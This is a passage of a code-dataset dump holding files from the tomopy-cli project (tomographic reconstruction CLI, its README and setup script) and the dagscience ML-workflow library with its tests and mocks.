view data collection\")\n miss_angles = [params.missing_angles_start, params.missing_angles_end]\n \n # Manage the missing angles:\n proj = np.concatenate((proj[0:miss_angles[0],:,:], proj[miss_angles[1]+1:-1,:,:]), axis=0)\n theta = np.concatenate((theta[0:miss_angles[0]], theta[miss_angles[1]+1:-1]))\n \n # new missing 
projection handling\n # if params.blocked_views:\n # log.warning(\" *** new missing angle handling\")\n # miss_angles = [params.missing_angles_start, params.missing_angle_end]\n # data = patch_projection(data, miss_angles)\n\n proj, flat, dark = binning(proj, flat, dark, params)\n\n rotation_axis = params.rotation_axis / np.power(2, float(params.binning))\n log.info(\" *** rotation center: %f\" % rotation_axis)\n\n return proj, flat, dark, theta, rotation_axis\n\ndef binning(proj, flat, dark, params):\n\n log.info(\" *** binning\")\n if(params.binning == 0):\n log.info(' *** *** OFF')\n else:\n log.warning(' *** *** ON')\n log.warning(' *** *** binning: %d' % params.binning)\n proj = _binning(proj, params)\n flat = _binning(flat, params)\n dark = _binning(dark, params)\n\n return proj, flat, dark\n\ndef _binning(data, params):\n\n data = tomopy.downsample(data, level=int(params.binning), axis=2) \n data = tomopy.downsample(data, level=int(params.binning), axis=1)\n\n return data\n\n\ndef flip_and_stitch(params, img360, flat360, dark360):\n\n center = int(params.rotation_axis_flip)\n img = np.zeros([img360.shape[0]//2,img360.shape[1],2*img360.shape[2]-2*center],dtype=img360.dtype)\n flat = np.zeros([flat360.shape[0],flat360.shape[1],2*flat360.shape[2]-2*center],dtype=img360.dtype)\n dark = np.zeros([dark360.shape[0],dark360.shape[1],2*dark360.shape[2]-2*center],dtype=img360.dtype)\n img[:,:,img360.shape[2]-2*center:] = img360[:img360.shape[0]//2,:,:]\n img[:,:,:img360.shape[2]] = img360[img360.shape[0]//2:,:,::-1]\n flat[:,:,flat360.shape[2]-2*center:] = flat360\n flat[:,:,:flat360.shape[2]] = flat360[:,:,::-1]\n dark[:,:,dark360.shape[2]-2*center:] = dark360\n dark[:,:,:dark360.shape[2]] = dark360[:,:,::-1]\n\n params.rotation_axis = img.shape[2]//2\n\n return img, flat, dark\n\n\ndef patch_projection(data, miss_angles):\n\n fdatanew = np.fft.fft(data,axis=2)\n\n w = int((miss_angles[1]-miss_angles[0]) * 0.3)\n\n fdatanew[miss_angles[0]:miss_angles[0]+w,:,:] = np.fft.fft(data[miss_angles[0]-1,:,:],axis=1)\n fdatanew[miss_angles[0]:miss_angles[0]+w,:,:] *= np.reshape(np.cos(np.pi/2*np.linspace(0,1,w)),[w,1,1])\n\n fdatanew[miss_angles[1]-w:miss_angles[1],:,:] = np.fft.fft(data[miss_angles[1]+1,:,:],axis=1)\n fdatanew[miss_angles[1]-w:miss_angles[1],:,:] *= np.reshape(np.sin(np.pi/2*np.linspace(0,1,w)),[w,1,1])\n\n fdatanew[miss_angles[0]+w:miss_angles[1]-w,:,:] = 0\n # lib.warning(\" *** %d, %d, %d \" % (datanew.shape[0], datanew.shape[1], datanew.shape[2]))\n\n lib.warning(\" *** patch_projection\")\n slider(np.log(np.abs(fdatanew.swapaxes(0,1))), axis=0)\n a = np.real(np.fft.ifft(fdatanew,axis=2))\n b = np.imag(np.fft.ifft(fdatanew,axis=2))\n # print(a.shape)\n slider(a.swapaxes(0,1), axis=0)\n slider(b.swapaxes(0,1), axis=0)\n return np.real(np.fft.ifft(fdatanew,axis=2))\n\n\ndef get_dx_dims(params):\n \"\"\"\n Read array size of a specific group of Data Exchange file.\n Parameters\n ----------\n fname : str\n String defining the path of file or file name.\n dataset : str\n Path to the dataset inside hdf5 file where data is located.\n Returns\n -------\n ndarray\n Data set size.\n \"\"\"\n\n dataset='data'\n\n grp = '/'.join(['exchange', dataset])\n\n with h5py.File(params.hdf_file, \"r\") as f:\n try:\n data = f[grp]\n except KeyError:\n return None\n\n shape = data.shape\n\n return shape\n\n\ndef file_base_name(fname):\n if '.' 
in fname:\n separator_index = fname.index('.')\n base_name = fname[:separator_index]\n return base_name\n else:\n return fname\n\ndef path_base_name(path):\n fname = os.path.basename(path)\n return file_base_name(fname)\n\n\ndef read_rot_centers(params):\n\n # Add a trailing slash if missing\n top = os.path.join(params.hdf_file, '')\n\n # Load the the rotation axis positions.\n jfname = top + \"rotation_axis.json\"\n \n try:\n with open(jfname) as json_file:\n json_string = json_file.read()\n dictionary = json.loads(json_string)\n\n return collections.OrderedDict(sorted(dictionary.items()))\n\n except Exception as error: \n log.error(\"ERROR: the json %s file containing the rotation axis locations is missing\" % jfname)\n log.error(\"ERROR: to create one run:\")\n log.error(\"ERROR: $ tomopy find_center --hdf-file %s\" % top)\n exit()\n" }, { "alpha_fraction": 0.632311999797821, "alphanum_fraction": 0.632311999797821, "avg_line_length": 24.571428298950195, "blob_id": "9a1317e3e988cbb21c5f488cc17298b3d8748bed", "content_id": "b21cf1bdecd7a0448690231e4a33c3c230061268", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 359, "license_type": "no_license", "max_line_length": 49, "num_lines": 14, "path": "/setup.py", "repo_name": "data-exchange/tomopy-cli-last-before-tomography", "src_encoding": "UTF-8", "text": "from setuptools import setup, find_packages\n\nsetup(\n name='tomopy-cli',\n version=open('VERSION').read().strip(),\n #version=__version__,\n author='Francesco De Carlo',\n author_email='[email protected]',\n url='https://github.com/decarlof/tomopy-cli',\n packages=find_packages(),\n scripts=['bin/tomopy'],\n description='cli for tomopy',\n zip_safe=False,\n)\n\n" }, { "alpha_fraction": 0.5430586934089661, "alphanum_fraction": 0.560330867767334, "avg_line_length": 47.15625, "blob_id": "9dfbe29bcb00979c2c1541ef82853965522db734", "content_id": "e1543c986f335408fcd921a9f0d719a6f638430e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 12334, "license_type": "no_license", "max_line_length": 235, "num_lines": 256, "path": "/README.rst", "repo_name": "data-exchange/tomopy-cli-last-before-tomography", "src_encoding": "UTF-8", "text": "==========\ntomopy-cli\n==========\n\n**tomopy** is commad-line-interface for `tomopy <https://github.com/tomopy/tomopy>`_ an open-source Python package for tomographic data processing and image reconstruction. \n\n\nInstallation\n============\n\n::\n\n $ python setup.py install\n\nin a prepared virtualenv or as root for system-wide installation.\n\n.. warning:: If your python installation is in a location different from #!/usr/bin/env python please edit the first line of the bin/tomopy file to match yours.\n\nDependencies\n============\n\nInstall the following package::\n\n $ conda install -c conda-forge tomopy\n\n\nUsage\n=====\n\nReconstruction\n--------------\n\nTo do a tomographic reconstruction::\n\n $ tomopy recon --hdf-file /local/data.h5\n\nfrom the command line. To get correct results, you may need to append\noptions such as `--rotation-axis` to set the rotation axis position::\n\n $ tomopy recon --rotation-axis 1024.0 --hdf-file /local/data.h5\n\nto list of all available options::\n\n $ tomopy recon -h\n\n\nConfiguration File\n------------------\n\nReconstruction parameters are stored in **tomopy.conf**. 
You can create a template with::\n\n $ tomopy init\n\n**tomopy.conf** is constantly updated to keep track of the last stored parameters, as initalized by **init** or modified by setting a new option value. For example to re-run the last reconstrusction with identical parameters just use::\n\n $ tomopy recon\n\nTo run a reconstruction with a different and previously stored configuration file **old_tomopy.conf** just use::\n\n $ tomopy recon --config old_tomopy.conf\n\n\nFind Center\n-----------\n\nTo automatically find the rotation axis location of all tomographic hdf data sets in a folder (/local/data/)::\n\n $ tomopy find_center --hdf-file /local/data/\n\n\nthis generates in the /local/data/ directory a **rotation_axis.json** file containing all the automatically calculated centers::\n\n {\"0\": {\"proj_0000.hdf\": 1287.25}, \"1\": {\"proj_0001.hdf\": 1297.75},\n {\"2\": {\"proj_0002.hdf\": 1287.25}, \"3\": {\"proj_0003.hdf\": 1297.75},\n {\"4\": {\"proj_0004.hdf\": 1287.25}, \"5\": {\"proj_0005.hdf\": 1297.75}}\n\nto list of all available options::\n\n $ tomopy find_center -h\n\n\nAfter using **find_center**, to do a tomographic reconstruction of all tomographic hdf data sets in a folder (/local/data/)::\n\n $ tomopy recon --hdf-file /local/data/\n\n\nHelp\n----\n\n::\n\n $ tomopy -h\n usage: tomopy [-h] [--config FILE] [--version] ...\n\n optional arguments:\n -h, --help show this help message and exit\n --config FILE File name of configuration file\n --version show program's version number and exit\n\n Commands:\n \n init Create configuration file\n recon Run tomographic reconstruction\n find_center Find rotation axis location for all hdf files in a directory\n\n::\n\n $ tomopy recon -h\n usage: tomopy recon [-h] [--center-search-width CENTER_SEARCH_WIDTH]\n [--binning {0,1,2,3}] [--blocked-views] [--dark-zero]\n [--hdf-file PATH]\n [--hdf-file-type {standard,flip_and_stich,mosaic}]\n [--nsino NSINO]\n [--nsino-per-chunk {2,4,8,16,32,64,128,256,512,1024,2048}]\n [--reverse] [--rotation-axis ROTATION_AXIS]\n [--rotation-axis-flip ROTATION_AXIS_FLIP]\n [--missing-angles-end MISSING_ANGLES_END]\n [--missing-angles-start MISSING_ANGLES_START]\n [--zinger-level-projections ZINGER_LEVEL_PROJECTIONS]\n [--zinger-level-white ZINGER_LEVEL_WHITE]\n [--zinger-removal-method {none,standard}]\n [--zinger-size ZINGER_SIZE] [--air AIR]\n [--fix-nan-and-inf]\n [--fix-nan-and-inf-value FIX_NAN_AND_INF_VALUE]\n [--flat-correction-method {standard,air,none}]\n [--minus-log]\n [--normalization-cutoff NORMALIZATION_CUTOFF]\n [--stripe-removal-method {none,fourier-wavelet,titarenko,smoothing-filter}]\n [--fourier-wavelet-filter {haar,db5,sym5,sym16}]\n [--fourier-wavelet-level FOURIER_WAVELET_LEVEL]\n [--fourier-wavelet-pad]\n [--fourier-wavelet-sigma FOURIER_WAVELET_SIGMA]\n [--titarenko-alpha TITARENKO_ALPHA]\n [--titarenko-nblock TITARENKO_NBLOCK]\n [--smoothing-filter-size SMOOTHING_FILTER_SIZE]\n [--alpha ALPHA] [--alpha-try] [--energy ENERGY] [--pad]\n [--phase-retrieval-method {none,paganin}]\n [--pixel-size PIXEL_SIZE]\n [--propagation-distance PROPAGATION_DISTANCE]\n [--filter {none,shepp,cosine,hann,hamming,ramlak,parzen,butterworth}]\n [--reconstruction-algorithm {art,astrasirt,astracgls,bart,fpb,gridrec,mlem,osem,ospml_hybrid,ospml_quad,pml_hybrid,pml_quad,sirt,tv,grad,tikh}]\n [--reconstruction-mask]\n [--reconstruction-mask-ratio RECONSTRUCTION_MASK_RATIO]\n [--reconstruction-type {try,slice,full}]\n [--iteration-count ITERATION_COUNT] [--config FILE]\n [--logs-home FILE] [--rotation-axis-file 
FILE] [--verbose]\n\n optional arguments:\n -h, --help show this help message and exit\n --center-search-width CENTER_SEARCH_WIDTH\n +/- center search width (pixel). Search is in 0.5\n pixel increments (default: 10.0)\n --binning {0,1,2,3} Reconstruction binning factor as power(2, choice)\n (default: 0)\n --blocked-views When set, the missing-angles options are used\n (default: False)\n --dark-zero When set, the the dark field is set to zero (default:\n False)\n --hdf-file PATH Name of the last used hdf file or directory containing\n multiple hdf files (default: .)\n --hdf-file-type {standard,flip_and_stich,mosaic}\n Input file type (default: standard)\n --nsino NSINO Location of the sinogram used for slice reconstruction\n and find axis (0 top, 1 bottom) (default: 0.5)\n --nsino-per-chunk {2,4,8,16,32,64,128,256,512,1024,2048}\n Number of sinagram per chunk. Use larger numbers with\n computers with larger memory (default: 32)\n --reverse When set, the data set was collected in reverse\n (180-0) (default: False)\n --rotation-axis ROTATION_AXIS\n Location of rotation axis (default: 1224.0)\n --rotation-axis-flip ROTATION_AXIS_FLIP\n Location of rotation axis in a 0-360 flip and stich\n data collection (default: 1224.0)\n --missing-angles-end MISSING_ANGLES_END\n Projection number of the first blocked view (default:\n 1)\n --missing-angles-start MISSING_ANGLES_START\n Projection number of the first blocked view (default:\n 0)\n --zinger-level-projections ZINGER_LEVEL_PROJECTIONS\n Expected difference value between outlier value and\n the median value of the array (default: 800.0)\n --zinger-level-white ZINGER_LEVEL_WHITE\n Expected difference value between outlier value and\n the median value of the array (default: 1000.0)\n --zinger-removal-method {none,standard}\n Zinger removal correction method (default: none)\n --zinger-size ZINGER_SIZE\n Size of the median filter (default: 3)\n --air AIR Number of pixels at each boundary to calculate the\n scaling factor (default: 10)\n --fix-nan-and-inf Fix nan and inf (default: False)\n --fix-nan-and-inf-value FIX_NAN_AND_INF_VALUE\n Values to be replaced with negative values in array\n (default: 0.0)\n --flat-correction-method {standard,air,none}\n Flat correction method (default: standard)\n --minus-log Minus log (default: False)\n --normalization-cutoff NORMALIZATION_CUTOFF\n Permitted maximum vaue for the normalized data\n (default: 1.0)\n --stripe-removal-method {none,fourier-wavelet,titarenko,smoothing-filter}\n Stripe removal method (default: none)\n --fourier-wavelet-filter {haar,db5,sym5,sym16}\n Type of the fourier-wavelet filter (default: sym16)\n --fourier-wavelet-level FOURIER_WAVELET_LEVEL\n Level parameter used by the fourier-wavelet method\n (default: 7)\n --fourier-wavelet-pad\n When set, extend the size of the sinogram by padding\n with zeros (default: False)\n --fourier-wavelet-sigma FOURIER_WAVELET_SIGMA\n Damping parameter in Fourier space (default: 1)\n --titarenko-alpha TITARENKO_ALPHA\n Damping factor (default: 1.5)\n --titarenko-nblock TITARENKO_NBLOCK\n Number of blocks (default: 0)\n --smoothing-filter-size SMOOTHING_FILTER_SIZE\n Size of the smoothing filter. 
(default: 5)\n --alpha ALPHA Regularization parameter (default: 0.001)\n --alpha-try When set, multiple reconstruction of the same slice\n with different alpha coefficient are generated\n (default: False)\n --energy ENERGY X-ray energy [keV] (default: 20)\n --pad When set, extend the size of the sinogram by padding\n with zeros (default: False)\n --phase-retrieval-method {none,paganin}\n Phase retrieval correction method (default: none)\n --pixel-size PIXEL_SIZE\n Pixel size [microns] (default: 1.17)\n --propagation-distance PROPAGATION_DISTANCE\n Sample detector distance [mm] (default: 60)\n --filter {none,shepp,cosine,hann,hamming,ramlak,parzen,butterworth}\n Reconstruction filter (default: parzen)\n --reconstruction-algorithm {art,astrasirt,astracgls,bart,fpb,gridrec,mlem,osem,ospml_hybrid,ospml_quad,pml_hybrid,pml_quad,sirt,tv,grad,tikh}\n Reconstruction algorithm (default: gridrec)\n --reconstruction-mask\n When set, applies circular mask to the reconstructed\n slices (default: False)\n --reconstruction-mask-ratio RECONSTRUCTION_MASK_RATIO\n Ratio of the mask’s diameter in pixels to the smallest\n edge size along given axis (default: 1.0)\n --reconstruction-type {try,slice,full}\n Reconstruct slice or full data set. For option (try):\n multiple reconstruction of the same slice with\n different (rotation axis) are generated (default: try)\n --iteration-count ITERATION_COUNT\n Maximum number of iterations (default: 10)\n --config FILE File name of configuration file (default:\n /Users/decarlo/tomopy.conf)\n --logs-home FILE Log file directory (default: /Users/decarlo/logs)\n --rotation-axis-file FILE\n File name of rataion axis locations (default:\n rotation_axis.json)\n --verbose Verbose output (default: False) \n" }, { "alpha_fraction": 0.576031506061554, "alphanum_fraction": 0.5878534913063049, "avg_line_length": 40.47595977783203, "blob_id": "721ccbb944b09db513cbb58df98793083a58a3d0", "content_id": "434477091e72832f069372cc6dd7734091c606cc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8628, "license_type": "no_license", "max_line_length": 173, "num_lines": 208, "path": "/tomopy_cli/recon.py", "repo_name": "data-exchange/tomopy-cli-last-before-tomography", "src_encoding": "UTF-8", "text": "import os\nimport sys\nimport shutil\nimport pathlib\nimport numpy as np\nimport tomopy\nimport dxchange\n\nfrom tomopy_cli import log\nfrom tomopy_cli import file_io\nfrom tomopy_cli import prep\n\n\ndef rec(params):\n \n data_shape = file_io.get_dx_dims(params)\n\n if params.rotation_axis < 0:\n params.rotation_axis = data_shape[2]/2\n\n # Select sinogram range to reconstruct\n if (params.reconstruction_type == \"full\"):\n nSino_per_chunk = params.nsino_per_chunk\n chunks = int(np.ceil(data_shape[1]/nSino_per_chunk)) \n sino_start = 0\n sino_end = chunks*nSino_per_chunk\n\n else: # \"slice\" and \"try\" \n nSino_per_chunk = pow(2, int(params.binning))\n chunks = 1\n ssino = int(data_shape[1] * params.nsino)\n sino_start = ssino\n sino_end = sino_start + pow(2, int(params.binning)) \n\n\n log.info(\"reconstructing [%d] slices from slice [%d] to [%d] in [%d] chunks of [%d] slices each\" % \\\n ((sino_end - sino_start)/pow(2, int(params.binning)), sino_start/pow(2, int(params.binning)), sino_end/pow(2, int(params.binning)), \\\n chunks, nSino_per_chunk/pow(2, int(params.binning)))) \n\n strt = 0\n for iChunk in range(0, chunks):\n log.info('chunk # %i/%i' % (iChunk, chunks))\n sino_chunk_start = np.int(sino_start + 
nSino_per_chunk*iChunk)\n sino_chunk_end = np.int(sino_start + nSino_per_chunk*(iChunk+1))\n log.info(' *** [%i, %i]' % (sino_chunk_start/pow(2, int(params.binning)), sino_chunk_end/pow(2, int(params.binning))))\n \n if sino_chunk_end > sino_end: \n break\n\n sino = (int(sino_chunk_start), int(sino_chunk_end))\n\n # Read APS 32-BM raw data.\n proj, flat, dark, theta, rotation_axis = file_io.read_tomo(sino, params)\n\n # apply all preprocessing functions\n data = prep.all(proj, flat, dark, params)\n\n # Reconstruct\n if (params.reconstruction_type == \"try\"):\n # try passes an array of rotation centers and this is only supported by gridrec\n reconstruction_algorithm_org = params.reconstruction_algorithm\n params.reconstruction_algorithm = 'gridrec'\n\n center_search_width = params.center_search_width/np.power(2, float(params.binning))\n center_range = (rotation_axis-center_search_width, rotation_axis+center_search_width, 0.5)\n stack = np.empty((len(np.arange(*center_range)), data_shape[0], int(data_shape[2]/ np.power(2, float(params.binning)))))\n index = 0\n for axis in np.arange(*center_range):\n stack[index] = data[:, 0, :]\n index = index + 1\n log.warning(' reconstruct slice [%d] with rotation axis range [%.2f - %.2f] in [%.2f] pixel steps' % (ssino, center_range[0], center_range[1], center_range[2]))\n\n rotation_axis = np.arange(*center_range)\n rec = padded_rec(stack, theta, rotation_axis, params)\n\n # Save images to a temporary folder.\n fname = os.path.dirname(params.hdf_file) + '_rec' + os.sep + 'try_center' + os.sep + file_io.path_base_name(params.hdf_file) + os.sep + 'recon_'\n index = 0\n for axis in np.arange(*center_range):\n rfname = fname + str('{0:.2f}'.format(axis*np.power(2, float(params.binning))) + '.tiff')\n dxchange.write_tiff(rec[index], fname=rfname, overwrite=True)\n index = index + 1\n\n # restore original method\n params.reconstruction_algorithm = reconstruction_algorithm_org\n\n else: # \"slice\" and \"full\"\n rec = padded_rec(data, theta, rotation_axis, params)\n\n # handling of the last chunk \n if (params.reconstruction_type == \"full\"):\n if(iChunk == chunks-1):\n log.info(\"handling of the last chunk\")\n log.info(\" *** chunk # %d\" % (chunks))\n log.info(\" *** last rec size %d\" % ((data_shape[1]-(chunks-1)*nSino_per_chunk)/pow(2, int(params.binning))))\n rec = rec[0:data_shape[1]-(chunks-1)*nSino_per_chunk,:,:]\n\n # Save images\n if (params.reconstruction_type == \"full\"):\n tail = os.sep + os.path.splitext(os.path.basename(params.hdf_file))[0]+ '_rec' + os.sep \n fname = os.path.dirname(params.hdf_file) + '_rec' + tail + 'recon'\n dxchange.write_tiff_stack(rec, fname=fname, start=strt)\n strt += int((sino[1] - sino[0]) / np.power(2, float(params.binning)))\n if (params.reconstruction_type == \"slice\"):\n fname = os.path.dirname(params.hdf_file) + os.sep + 'slice_rec/recon_' + os.path.splitext(os.path.basename(params.hdf_file))[0]\n dxchange.write_tiff_stack(rec, fname=fname, overwrite=False)\n\n\n log.info(\" *** reconstructions: %s\" % fname)\n\n \n\ndef padded_rec(data, theta, rotation_axis, params):\n\n # original shape\n N = data.shape[2]\n # padding\n data, padded_rotation_axis = padding(data, rotation_axis, params) \n # reconstruct object\n rec = reconstruct(data, theta, padded_rotation_axis, params)\n # un-padding - restore shape \n rec = unpadding(rec, N, params)\n # mask each reconstructed slice with a circle\n rec = mask(rec, params)\n\n return rec\n\n\ndef padding(data, rotation_axis, params):\n\n log.info(\" *** padding\")\n\n 
if(params.padding):\n log.info(' *** *** ON')\n N = data.shape[2]\n data_pad = np.zeros([data.shape[0],data.shape[1],3*N//2],dtype = \"float32\")\n data_pad[:,:,N//4:5*N//4] = data\n data_pad[:,:,0:N//4] = np.reshape(data[:,:,0],[data.shape[0],data.shape[1],1])\n data_pad[:,:,5*N//4:] = np.reshape(data[:,:,-1],[data.shape[0],data.shape[1],1])\n\n data = data_pad\n rot_center = rotation_axis + N//4\n else:\n log.warning(' *** *** OFF')\n data = data\n rot_center = rotation_axis\n\n return data, rot_center\n\n\ndef unpadding(rec, N, params):\n\n log.info(\" *** un-padding\")\n if(params.padding):\n log.info(' *** *** ON')\n rec = rec[:,N//4:5*N//4,N//4:5*N//4]\n else:\n log.warning(' *** *** OFF')\n rec = rec\n return rec\n\n\ndef reconstruct(data, theta, rot_center, params):\n\n if(params.reconstruction_type == \"try\"):\n sinogram_order = True\n else:\n sinogram_order = False\n \n log.info(\" *** algorithm: %s\" % params.reconstruction_algorithm)\n if params.reconstruction_algorithm == 'astrasirt':\n extra_options ={'MinConstraint':0}\n options = {'proj_type':'cuda', 'method':'SIRT_CUDA', 'num_iter':200, 'extra_options':extra_options}\n shift = (int((data.shape[2]/2 - rot_center)+.5))\n data = np.roll(data, shift, axis=2)\n rec = tomopy.recon(data, theta, algorithm=tomopy.astra, options=options)\n elif params.reconstruction_algorithm == 'astracgls':\n extra_options ={'MinConstraint':0}\n options = {'proj_type':'cuda', 'method':'CGLS_CUDA', 'num_iter':15, 'extra_options':extra_options}\n shift = (int((data.shape[2]/2 - rot_center)+.5))\n data = np.roll(data, shift, axis=2)\n rec = tomopy.recon(data, theta, algorithm=tomopy.astra, options=options)\n elif params.reconstruction_algorithm == 'gridrec':\n log.warning(\" *** *** sinogram_order: %s\" % sinogram_order)\n rec = tomopy.recon(data, theta, center=rot_center, sinogram_order=sinogram_order, algorithm=params.reconstruction_algorithm, filter_name=params.filter)\n else:\n log.warning(\" *** *** algorithm: %s is not supported yet\" % params.reconstruction_algorithm)\n params.reconstruction_algorithm = 'gridrec'\n log.warning(\" *** *** using: %s instead\" % params.reconstruction_algorithm)\n log.warning(\" *** *** sinogram_order: %s\" % sinogram_order)\n rec = tomopy.recon(data, theta, center=rot_center, sinogram_order=sinogram_order, algorithm=params.reconstruction_algorithm, filter_name=params.filter)\n\n return rec\n\n\ndef mask(data, params):\n\n log.info(\" *** mask\")\n if(params.reconstruction_mask):\n log.info(' *** *** ON')\n if 0 < params.reconstruction_mask_ratio <= 1:\n log.warning(\" *** mask ratio: %f \" % params.reconstruction_mask_ratio)\n data = tomopy.circ_mask(data, axis=0, ratio=params.reconstruction_mask_ratio)\n else:\n log.error(\" *** mask ratio must be between 0-1: %f is ignored\" % params.reconstruction_mask_ratio)\n else:\n log.warning(' *** *** OFF')\n return data\n\n" } ]
5
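The `padding` routine in recon.py above grows each sinogram from width N to 3N/2, edge-extends the two flanks with the boundary values, and shifts the rotation axis by N/4; `unpadding` then crops the same window back out. A small numpy-only illustration of that index bookkeeping follows — a sketch under assumed toy shapes and names, not code from the repository.

```python
import numpy as np

def pad_sino(data, rotation_axis):
    """Sketch of recon.py's pad step on a (angles, slices, width) array."""
    n = data.shape[2]
    padded = np.zeros([data.shape[0], data.shape[1], 3 * n // 2], dtype='float32')
    padded[:, :, n // 4:5 * n // 4] = data            # original block, centred
    padded[:, :, :n // 4] = data[:, :, 0:1]           # repeat left edge value
    padded[:, :, 5 * n // 4:] = data[:, :, -1:]       # repeat right edge value
    return padded, rotation_axis + n // 4             # axis shifts with the pad

data = np.random.rand(181, 2, 64).astype('float32')
padded, center = pad_sino(data, 32.0)
unpadded = padded[:, :, 64 // 4:5 * 64 // 4]          # the un-pad crop
assert np.allclose(unpadded, data) and center == 48.0
```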
ClaudioDavi/dagscience
https://github.com/ClaudioDavi/dagscience
fe09ec25d0d3ae2ef8f77dbc92e965c01bed1f45
6305c38b64c5520a00f1f2d2be255ccc7c9fed6a
394aed21c309761b01f869060d4ab7ade0f0d0fb
refs/heads/master
2020-04-27T14:11:42.309236
2019-03-10T22:23:38
2019-03-10T22:23:38
174,400,870
2
0
null
null
null
null
null
[ { "alpha_fraction": 0.6555023789405823, "alphanum_fraction": 0.6555023789405823, "avg_line_length": 28.85714340209961, "blob_id": "8534b8f5e4da4d381c67b06a6a7a56e037e204d9", "content_id": "294c0931522149faf8db5747a7bf042bfdf8ff92", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 627, "license_type": "permissive", "max_line_length": 80, "num_lines": 21, "path": "/tests/test_steps.py", "repo_name": "ClaudioDavi/dagscience", "src_encoding": "UTF-8", "text": "from dagscience.step_manager import Step\nfrom .mock_workflow import MockGetData, MockPreprocess, MockTrain, MockSaveModel\nimport os\nimport configparser\n\n\nclass TestStep():\n step = Step(MockGetData(), MockPreprocess(),\n MockTrain(), MockSaveModel())\n\n def test_step_writer(self):\n self.step.step_writer()\n assert os.path.exists('.steps')\n os.remove('.steps')\n\n def test_step_writer_sections(self):\n self.step.step_writer()\n sections = configparser.ConfigParser()\n sections.read('.steps')\n assert 'STEPS' in sections.sections()\n os.remove('.steps')\n" }, { "alpha_fraction": 0.5995671153068542, "alphanum_fraction": 0.6020021438598633, "avg_line_length": 25.028169631958008, "blob_id": "c088c1d51d75c9f714796f4c7edafa4f1ad4044b", "content_id": "0fcf08d1230a85cebdf1c5717ada117862ba4265", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3696, "license_type": "permissive", "max_line_length": 90, "num_lines": 142, "path": "/dagscience/workflow.py", "repo_name": "ClaudioDavi/dagscience", "src_encoding": "UTF-8", "text": "from abc import ABC, abstractmethod\nimport logging\nfrom .step_manager import Step\n\n\nclass DagflowCycle:\n \"\"\"\n Every cycle on a DAG workflow begins with run.\n To implement a workflow you should build all the\n Task classes according to your needs and then pass\n them as parameters to the DagflowCycle object.\n After that, the workflow will take care of the process.\n \"\"\"\n\n logger = logging.getLogger(__name__)\n\n def __init__(self, task_get_data, task_preprocess, task_train, task_model_saver):\n \"\"\"\n Creates the workflow.\n\n params:\n\n task_get_data -- Implementation of the TaskGetData class\n\n task_preprocess -- Implementation of the TaskPreprocess class\n\n task_train -- Implementation of the TaskTrain class\n\n task_model_saver -- Implementation of the TaskSaveModel class\n\n returns:\n\n The workflow cycle\n \"\"\"\n if (\n issubclass(task_get_data.__class__, TaskGetData)\n and issubclass(task_preprocess.__class__, TaskPreprocess)\n and issubclass(task_train.__class__, TaskTrain)\n and issubclass(task_model_saver.__class__, TaskSaveModel)\n ):\n self.step = Step(task_get_data, task_preprocess, task_train, task_model_saver)\n\n def run(self, step_1=True, step_2=True, step_3=True):\n \"\"\"\n Runs the workflow cycle; individual steps can be disabled through the parameters.\n Returns the machine learning model.\n\n params:\n\n step_1 -- Default(True) Enables loading the data from external sources. \n If false, loads from disk, or as defined in load_from_filesystem\n\n step_2 -- Default(True) Enables the preprocessing of the data. \n If false, returns the original data.\n\n step_3 -- Default(True) Enables the creation and training of the model. \n If false, only loads the model from the file system\n\n returns:\n Machine learning model.\n \"\"\"\n return self.step.execute_steps(step_1, step_2, step_3)\n\n def describe(self):\n pass\n\n\nclass TaskGetData(ABC):\n \"\"\"Abstract class to load data from the specified sources\"\"\"\n\n def __init__(self):\n pass\n\n @abstractmethod\n def load_from_source(self, *args, **kwargs):\n \"\"\"\n Loads data from the source\n \"\"\"\n\n @abstractmethod\n def load_from_filesystem(self, *args, **kwargs):\n \"\"\"\n Loads data from filesystem\n \"\"\"\n\n @abstractmethod\n def save(self, data, *args, **kwargs):\n \"\"\"\n Saves data to the repository\n \"\"\"\n\n\nclass TaskPreprocess(ABC):\n \"\"\"Abstract class to preprocess the data\"\"\"\n\n def __init__(self, *args, **kwargs):\n pass\n\n @abstractmethod\n def run(self, data, *args, **kwargs):\n \"\"\"\n Does preprocessing on the data, returns a dataframe\n \"\"\"\n\n\nclass TaskTrain(ABC):\n \"\"\" Abstract class to train and build the machine learning model\"\"\"\n\n def __init__(self):\n pass\n\n @abstractmethod\n def build_model(self):\n \"\"\"\n Builds your machine learning algorithm.\n Use this for hyperparameter tuning so it does not bloat the run method\n \"\"\"\n\n @abstractmethod\n def run(self, model, data):\n \"\"\"\n Runs the training job\n \"\"\"\n\n\nclass TaskSaveModel(ABC):\n \"\"\"Abstract class to save the machine learning model\"\"\"\n\n def __init__(self):\n pass\n\n @abstractmethod\n def save(self, model):\n \"\"\"\n Saves the model to the destination output\n \"\"\"\n\n @abstractmethod\n def load(self):\n \"\"\"\n Loads the model from target destination\n \"\"\"\n" }, { "alpha_fraction": 0.5826558470726013, "alphanum_fraction": 0.5826558470726013, "avg_line_length": 15.399999618530273, "blob_id": "b7caa786e66029fb32134bde4a2cff29033e13ef", "content_id": "c6dbf836bedaf3e43f4fd08c630d0b5cf7c4004b", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 738, "license_type": "permissive", "max_line_length": 52, "num_lines": 45, "path": "/tests/mock_workflow.py", "repo_name": "ClaudioDavi/dagscience", "src_encoding": "UTF-8", "text": "from dagscience import workflow\n\n\nclass MockGetData(workflow.TaskGetData):\n def __init__(self):\n pass\n\n def load_from_source(self, *args, **kwargs):\n pass\n\n def load_from_filesystem(self, *args, **kwargs):\n pass\n\n def save(self, data, *args, **kwargs):\n pass\n\n\nclass MockPreprocess(workflow.TaskPreprocess):\n def __init__(self):\n pass\n\n def run(self, data, *args, **kwargs):\n pass\n\n\nclass MockTrain(workflow.TaskTrain):\n def __init__(self):\n pass\n\n def build_model(self):\n pass\n\n def run(self, model, data):\n pass\n\n\nclass MockSaveModel(workflow.TaskSaveModel):\n def __init__(self):\n pass\n\n def save(self, model):\n pass\n\n def load(self):\n pass\n" }, { "alpha_fraction": 0.6627042889595032, "alphanum_fraction": 0.6802377700805664, "avg_line_length": 31.457944869995117, 